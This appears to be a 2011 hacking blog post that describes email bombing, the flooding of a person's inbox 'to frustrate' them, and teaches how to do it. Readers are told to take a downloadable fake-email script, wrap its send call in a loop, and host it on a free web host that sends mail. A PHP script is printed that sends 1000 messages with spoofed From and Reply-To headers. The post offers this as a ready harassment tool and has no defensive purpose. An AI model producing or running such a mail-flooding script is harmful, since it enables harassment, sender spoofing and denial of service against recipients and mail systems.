Monday, August 8, 2011

Email Bombing

What is Email Bombing?
This is same as fake email but the only difference is the number of email sent, the number of email can be 10, 20 or any number, it is generally used to frustrate a person. In many cases the message is large and constructed form meaningless data in an effort to consume additional system and network resources and may lead to denial of service.



How to Program a Email Bombing Script?
The PHP script for Email Bombing is same as fake email script the only difference we have to put the mail function inside a loop, and run it any number of times. Click here to download fake email sending script and edit the script as per example given below and upload it in a free website which supports mail sending service(x10hosting.com).
An example PHP script is shown below:-



<?php
$to = 'nobody@example.com';
$subject = 'subject here';
$message = 'anything';
$headers = 'From: anything@abc.com'  .  "\r\n"  .
       'Reply-To: anything@abc.com'  .  "\r\n"  .
       'X-Mailer: PHP/'  .  phpversion();


for ($i=1; $i <= 1000; $i++)
{
mail($to, $subject, $message, $headers );
}
?>


Try creating your own contact form or edit the fake email sending contact from as per your requirement.

No comments:

Post a Comment